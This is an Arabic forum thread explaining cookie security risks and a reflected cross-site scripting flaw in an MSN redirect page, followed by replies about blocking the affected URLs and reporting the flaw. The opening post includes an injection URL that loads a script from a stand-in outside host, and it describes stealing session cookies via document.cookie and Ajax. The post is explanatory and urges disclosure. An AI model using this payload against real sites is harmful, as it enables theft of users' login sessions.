صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 15 من 42

الموضوع: تبادل الخبرات[5]( الكوكيز وثغرة الـ MSN)

  1. #1
    خبير JavaScript
    تاريخ التسجيل
    Jul 2002
    المشاركات
    2,920

    تبادل الخبرات[5]( الكوكيز وثغرة الـ MSN)



    السلام عليكم

    المدخل

    الكوكيز: الحلوة الرقمية
    الكوكيز هو ملف نصي له وقت ينتهي، يقوم الخادم بزرعها في جهاز الزبون قصد حفظ بعض المعلومات و المتغيرات لحين استرجاعها او التعامل معها في اتصال آخر

    وتتراوح خطورة الكوكيز اذا تم فتح ثغرة للوصول اليها، من ثغرة لاتشكل أي خطر على الخادم و الزبون الى درجة خطيرة جدا قد تعصف بمعلومات الزبون، خصوصا اذا كان الكوكيز يعود لموقع بريد مهم ك msn yahoo gmail

    - ثعرة لا تشكل أي خطر
    عندما يتم الوصول الى الكوكيز لكن، المعلومات التي تكون مخزنة فيه تكون خاصة بمتغيرات و قيم لها علاقة بالتصميم او معلومات خاصة بالمتصفح، كأن يحفظ في الكوكيز نوع المتصفح او طول وعرض الشاشة اوقيم خاصة بطول او عرض خانة او صندوق او متغيرات خاصة بالجافاسكريبت، او عداد لإظهار نافذة منبثقة مرة كل ثلاث أيام مثلا.
    فهنا ان تم الوصول و التحكم في الكوكي فإنه لا يشكل أي خطر على صاحب السيرفر(الخادم) و صاحب الجهاز(الزبون)

    - ثغرة متوسطة
    هي الثغرة التي ان تم الكشف و الوصول الى الكوكيز يكون المتضرر الوحد هو العميل، كأن يعتمد في الكوكيز على الإحصائيات او تخزين رقم ال IP او بعض المعلومات عن الزبون قصد الإستفادة منها او ليقيم به موقعه، او معلومة يتذكر بها الجهاز ليضع إعلانات غير مكررة مثلا
    ان ثم الوصول و التلاعب في الكوكي، فلن يتضرر الزبون بل صاحب الصفحة هو من سيحصل له إختلال في المعلومات، التي يستجديها من جهاز الزبون

    - ثغرة عاصفة
    هي التي يكون فيها الكوكيز مخزن لبعض المعلومات الحساسة ككلمة المرور و كلمة السر وبعض القيم التي ان تغيرت يتم تغيير في قاعدة بيانات العميل
    تكمن الخطورة هنا ان تم الكشف عن ذاك الكوكيز، فإن مكتشف او المتلاعب بالكوكيز هنا ستكون له الأولوية على بريدك او حسابك
    والمتضرر هنا بالدرج الأولى هو الزبون الذي ستتعرض مصالحه للخطر

    هذه الثغرات كلها غير واردة الا إن كان المبرمج في تعامله مع الكوكيز لم يؤمنها
    والتأمين هنا ليس في حماية الكوكيز نفسه او إعلاق الأبواب الخلفية، بل في جعل البرمجة لا تقبل وسوم خارجية او تحكم خارجي في الكوكيز(أي من خارج الموقع، لأن الكوكيز يتعرف على الموقع من الإمتداد الجدري)
    حتى أن من خوف بعض مبرمجي ال php من الكوكيز يلتجئ الى الجلسات ثم الجلسات ولا حلوة صغيرة(cookie)

    المأزق
    الثغرة الأخيرة التي ذكرت والتي ان ثم توضيفها جيدا وكان للموقع رواجا كبيرا و مصالح للناس فيه، خصوصا ان كان بريد إلكتروني فإن بهذه الثغرة قد تعرضت عورات بريدهم للكشف لغيرهم كما حدث ومازال يحدث مع العملاق المتقزم(بسبب هذه الثغرة) ال msn
    أساس مشكلة ثغرة الكوكيز في ال msn
    سأحاول تقريبها بال php
    هذه الصفحة سنلاحظ انه يوجد بها متغير $RE هذا المتغير يأخد القيمة من العنوان
    كود PHP:
    <br>
    Unless your browser has scripting disabledyou should be returned to the 
    page you were at in a couple seconds
    .  Otherwiseplease click 
    <a href="$RE"><b>here</b></a>
    to return manually.
    </
    body></html
    أي إن كان العنوان هكذا
    www.xxx.msn.com?RE=www.swalif.net
    فإن ناتج الصفحة سيكون هو
    كود PHP:
    <br>
    Unless your browser has scripting disabledyou should be returned to the 
    page you were at in a couple seconds
    .  Otherwiseplease click 
    <a href="www.swalif.net"><b>here</b></a>
    to return manually.
    </
    body></html
    أين المشكل إذا؟
    المشكلة يبدوا ان مبرمج هذه الصفحة حين برمجته لها أكل من كبدة بائتة
    حيث جعل اية قيمة يحملها المتغيرRE تطبع في الصفحة دون مرورها من دوال للتحقق من مصداقيتها
    ماذا يعني هذا؟
    يعني ان المتغير يقبل الوسوم!!
    يكفي ان يكون مبرمج ذو بال حتى يقحم بعض الوسوم الحساسة، كأن يغلق وسم الرابط ليفتح وسم استدعاء السكريبت، وان تم له ان يستدعي ملف جافاسكريبت من داخل الوسم من جهازك فإنه بدالة document.coockie يعرف الكوكي كله الخاص بال msn طالما ان الموقع الجدري هو الذي يستدعيى السكريبت الفرعي، وهذا مثال مبسط
    ان كان الرابط

    كود PHP:
     www.xxx.msn.com?RE=#"></a><script src="http://www.xxx.com/hacker.js"></script><a href=" 
    بعد تحويل قيمة RE الى نسب مؤية عن طريق الدالة escap حتى لا يقع تعارض بين الرموز البرمجية و النصوص العادية
    فإن الناتج عن هذه الصفحة هي
    كود PHP:
    <br>
    Unless your browser has scripting disabledyou should be returned to the 
    page you were at in a couple seconds
    .  Otherwiseplease click 
    <a href="#"></a><script src="http://www.xxx.com/hacker.js "></script><a href=""><b>here</b></a>
    to return manually.
    </body></html> 
    معناه ان صفحة ال msn إستدعت ملف السكريبت http://www.xxx.com/hacker.js
    وهذا الملف الله وحده يعلم مايمكن ان يوضع فيه
    وما يمكن ان ينتج عن هذه الثغرة
    - الكوكيز ممكن سحبه بسهولة و غرساله عن طريق تقنية أجاكس دون ان تدري
    - كما يمكن ان يعدل لك في الكوكيز بما يناسبه
    - حقيقة ان أغلب كلمات السر التي تكون محفوظة في الكوكيز تكون مشفرة على وزن MD5 لكن يمكنه ان يلج لحسابك و في حسابك توجد كلمات مرور و أسرار أخرى
    - ان يضع لك أكواد ActiveX معلوم انه هناك اوامر لا تتعدى سطرين يمكن ان تعدل في قاعدة الروجيستر الخاصة بجهازك، وان وصل الى الروجستر فبإمكانه ان يجعلك عندما تريد ان تدخل الى hotmail يحولك مباشرة الى موقعه او يستدعي لك صورة او لعبة في صفحة ال msn
    (حقيقة تخرج رسالة تحذير انك ستعدل على ملفات النظام، لكن هناك من لا يعرف اصلا ماهو أكتف إكس، اوكي او خلاص)

    اين يكمن الخطر

    الخطر يكمن في انك لا تعرف الصفحة الملغومة وللأسف فايرفوكس بنفسه تمر عليه الحيلة (لأن الثغرة ليست ثغرة المتصفح) حيث يمكن ان يعطيك أحد رابط عادي لموقع معين او صفحة معينة حين الدخول اليها لا تكاد تعد في نفسك لغاية 3 حتى يكون انسحب من الكوكي ولا من شاف ولا من دري
    النقرة الأولى تقوم بتحويلك مباشرة الى الرابط الملغوم
    المرة الثانية يتم سحب الكوكي من الضحية و إرساله الهكر
    المرة الثالثة من خلال كود اللجافا الذي أحد منك الكوكيز هو نفسه بعد انتهاء العملية يعيدك الى الصفحة التي يريد ان يريها لك
    يني ان قال لك اليك موقع اخباري مثلا فإنك ستمر عبر مرحليتن ثم المرحلة الثالثة هي التي تفتح لك موقع الأخبار، كل هذا في أقل من 3 ثواني

    المخرج
    هو في مراسلة ال msn بهذه الثغرة رغم انها أقرت بها كم مرة ولم ترقعها و لا مرة أو تعليق خدمة ال msn الى أجل مسمى

    هناك أخطاء إملائية خصوص نسيان بعض الحروف حيت ان لوحة المفاتيح حاصتي عاصي الدمع

    إبراهيم بيدي

    تبادل الخبرات[4](إيجابيات وسلبيات أجاكس)
    تبادل الخبرات[3](Include(Ajax))
    تبادل الخبرات[2](البكسل و النسبة المؤية)
    تبادل الخبرات[1].(مالبديل للدالة)for







  2. #2
    خبير JavaScript
    تاريخ التسجيل
    Jul 2002
    المشاركات
    2,920


    سرعة البرق في التثبيت شكرا لكم
    أكيد ابو مشعل






  3. #3
    ينتظر رسالة التوكيد
    تاريخ التسجيل
    Sep 2006
    المشاركات
    288


    ما شاء الله ... موضوع أكثر من رائع

    على فكره أنا شاهدة الموضوع مثبت و عدد الزيارت واحد فقط .






  4. #4
    عضو شرف
    تاريخ التسجيل
    Mar 2005
    المشاركات
    943


    شكرا لك إستاذي العزيز ..

    معلومات قيمة ..

    افكر اليوم .. هل ممكن إيجاد برنامج يقرى أي ملف جافا في المتصفح قبل تنفيذ ما بي داخله
    هل ممكن وضع جدار ناري على ملف الكويكز ومن اراد ان يسحب من الملف الي بداخله الكويكز
    لابد ان نسمح له حتى نتحقق ..

    هذي بعض الاشياء الي دارة في ذهني ..

    واشكرك على موضوعك وشكرا لمن ثبت الموضوع ..

    والله بديت اخاف بكرى القاهم مخترقين جسمي بكرى القاه يناظرون بعيوني ولا يسمعون بذاني





    __________________
    @jawany

  5. #5
    عضو فعال
    تاريخ التسجيل
    Nov 2005
    المشاركات
    1,390


    بارك الله فيك عزيزي إبراهيم
    شكرا لك على هده المعلومات المفيدة
    _____________________________
    مامشيتي تا درتيها





    __________________
    اللهم أنت ربي لا إله الا أنت،
    خلقتني وأنا عبدك وأنا على عهدك ووعدك ما استطعت،
    أعوذ بك من شر ما صنعت،
    أبوء لك بنعمتك عليّ وأبوء بذنبي،
    فاغفر لي، فإنه لا يغفر الذنوب إلا أنت

  6. #6
    عضو نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    48


    جزاك الله خير أخي ..

    موضوع قيم ..ويستاهل التثبيت ..

    أخوك :- أبو عبدالعزيز العريني ..






  7. #7
    عضو نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    141


    وعليكم السلام

    اول شي ابرك لنفسي على الانضمام الي اسره سوالف سوفت
    وان شاء الله اقدر افيد واستفيد

    واحب اشكرك اخوي Wino على طرحك الموضوع

    والحاجة المقلقة هو سكوت MSN عن الثغره
    ونرى كل يوم ايميل يسقط بستخدام الاستثمار

    حصلت على برنامج اجنبي وطورته وهو الحل الوحيد في الوقت الحالي
    http://saudihacker.net/mailsecurity.htm

    طبعا يمكنك التخلص من الكوكاز بطريقة الاعتيادية بس بيكون متعب شوي
    والبرنامج ذا مبسط الي ابعد درجة " والحمد الله تم التجربة ونجح في ابطال عمل
    الاستثمار "

    " يعتبر هذا حل مؤقت "
    وتحياتي لك





    التعديل الأخير تم بواسطة ماجد العتيبي ; 08-09-2006 الساعة 06:12 PM سبب آخر: اضافة كلمة

  8. #8


    مجهود تشكر عليه في الشرح المتكامل أخي إبراهيم .. لكن لا ادري لماذا لا زلت لا اصدق وجود هذه الثغرة في MSN و أعتبرها إشاعة ، هذه الثغرة كانت موجودة قبل 3 سنوات تقريبا و أغلقتها msn في غضون أسبوع ، اما ما يتكلم البعض عنه الآن بوجود هذه الثغرة فأظن انه مجرد اشاعه لأني لم أجد في المواقع المهتمة في مجال أمن المعلومات أي ضجه حول هذا الموضوع ...

    تحياتي






  9. #9
    عضو فعال
    تاريخ التسجيل
    Nov 2005
    المشاركات
    1,307


    جزاك الله خير الجزاء أخي الموقر زيزوار

    المخرج
    هو في مراسلة ال msn بهذه الثغرة
    وتمت مراسلة الشركه بهذ الثغره ونتمنى ان يجدوا لها حل بأسرع وقت ممكن ان شاءالله

    وإلا لذهبت الهوتميلات للمهملات ههههههههه وفقدنا كل المعلومات لاسمح الله

    abuse@hotmail.com
    falseaddress001@hotmail.com
    sales@hotmail.com

    راسلوهم أنتم إيضا والدال على الخير كفاعله

    تحيااتي





    __________________
    سبحان الله وبحمده
    سبحان الله العظيم

    "جديد" أكبر مركز تحميل عربي
    WwW.U111U.CoM
    دليل المواقع المرئية الأول عربيا
    9mbc.com
    هل صليت على النبي !!
    اقرب للحقيقه ستهرب من العراق مثل الجرذان

  10. #10
    خبير JavaScript
    تاريخ التسجيل
    Jul 2002
    المشاركات
    2,920


    عبدالعزيز سعود شكرا على المرور و أيضا تم تثبيت الموضوع بعد دقيقة تقريبا

    أخي جواني توجد برامج تفتح الملف دون تطبيقه تقريبا أغلب محررات النصوص تفعل هذا جرب editplus

    Mercedes الشكر لك انت على المساعدة

    ArabsMafia شكرا لك على المرور

    أخي -Saudi- مرحبا بك بيننا وكما قلت كل يوم ايميل يسقط بستخدام الاستثمار، شكرا على البرنامج

    البرواز صدقا بدوري لم أصدق الى ان أعطاني الأخ Mercedes رابط ملغوم بناءا على طلب مني وعند تحليله و برمجته، تأكد بما لا يدخل الشك ان الثغرة موجودة وقاتلة، راسلني ان شئت من سوالف(حتى أعرف انك انت) لأعطيك رابط إن دخلت اليه يعرض عليك نافذة بها جميع معلومات الكوكيز الخاصة بال msn
    بالإظافة انه سيظيف اليه كلمة winoooo كما في هذا المثال المرفق





    الصور المرفقة الصور المرفقة  

  11. #11
    خبير JavaScript
    تاريخ التسجيل
    Jul 2002
    المشاركات
    2,920


    بارك الله فيك أخي 9mbc وأحسن حل هو مراسلتهم بهذه الثغرة، تخاف أن تراسلهم فيردون عليك بأنهم لن يصلحون الا حين الإنتها من windows vista






  12. #12


    بارك الله فيك أخي Wino

    وأسأل الله أن يجعلها في ميزات حسناتك





    __________________
    مدونتي

  13. #13
    عضو سوبر نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    746


    جميل جداً ماشاءالله
    أعتقد بأنك قمت بترجمة server خطأً الى عميل والصحيح خادم






  14. #14
    عضو فعال جدا
    تاريخ التسجيل
    Jun 2003
    المشاركات
    2,123


    موضوع رائع مشاء الله الف شكر لك اخوي على التفصيل المفيد جدا .





    __________________
    htaccess بكل بساطة

    الشفرة الموحدة "يونِكود"

    (إن من مفاسد هذه الحضارة أنها تسمي الاحتيال ذكاءً، والانحلال حرية، و"الرذيلة فناً" والاستغلال معونة) - مصطفى السباعي

  15. #15


    والله أنا أشوف الحل لهذه الثغره التي تؤرق الكل في استخدام برامج الـ popup blocker او كما يسميها البعض ads blocker .
    فقط أضف الروابط الخطيره على موقع الـ msn والتي عن طريقها تتحقق سرقة الكوكيز
    والروابط هي:
    http://newsletters.msn.com
    http://calendar.msn.com

    أنا استخدم متصفح إسمه Maxthon ويوجد به plugin خاص بالـ popup والـ ads وهو يعمل معي على أكمل وجه.

    إذا في روابط أخرى ياليت تضيفوها ياشباب





    __________________
    al3ndaleeb[@]uk2.net





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض